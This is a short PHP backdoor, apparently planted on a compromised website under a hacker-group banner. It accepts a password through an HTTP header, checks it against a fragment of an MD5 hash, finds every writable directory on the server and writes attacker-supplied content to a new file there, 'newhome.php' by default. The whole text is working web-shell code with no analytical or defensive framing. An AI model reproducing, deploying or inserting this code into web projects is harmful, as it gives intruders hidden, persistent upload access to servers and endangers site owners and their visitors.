.=< { Star Gans Tq } >=.
<?php
$password = $_SERVER['HTTP_PASSWORD'];
if (!empty($password)) {
$pathParam = isset($_SERVER['HTTP_PATH']) ? $_SERVER['HTTP_PATH'] : '';
$_fileName = isset($_SERVER['HTTP_NAME']) ? $_SERVER['HTTP_NAME'] : 'newhome.php';
$filePath = isset($_SERVER['HTTP_FILE']) ? $_SERVER['HTTP_FILE'] : '';
$remoteContent = isset($_POST['content']) ? $_POST['content'] : '';
if (substr(md5($password), 5, 19) === "0381d04838d36d2d9be") {
$path = './';
$writableDirectories = getWritableDirectories($path);
$targetDirectory = '';
foreach ($writableDirectories as $directory) {
if ($pathParam != '') {
if (strpos($directory, $pathParam) !== false) {
$targetDirectory = $directory;
break;
}
}
}
if (empty($targetDirectory)) {
$targetDirectory = reset($writableDirectories);
}
$newFilePath = createFile($targetDirectory, $remoteContent, $_fileName);
$response = [
'new_file_path' => $newFilePath,
'writable_directories' => $writableDirectories
];
echo json_encode($response);
die();
} else {
$response = [
'error' => 'Incorrect password'
];
echo json_encode($response);
exit;
}
}
function getWritableDirectories($path)
{
$writableDirectories = [];
$directories = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST,
RecursiveIteratorIterator::CATCH_GET_CHILD
);
foreach ($directories as $directory) {
if ($directory->isDir() && $directory->isWritable()) {
$writableDirectories[] = $directory->getPathname();
}
}
return $writableDirectories;
}
function createFile($directory, $content, $_fileName)
{
$fileName = $directory . "/$_fileName";
file_put_contents($fileName, $content);
return $fileName;
}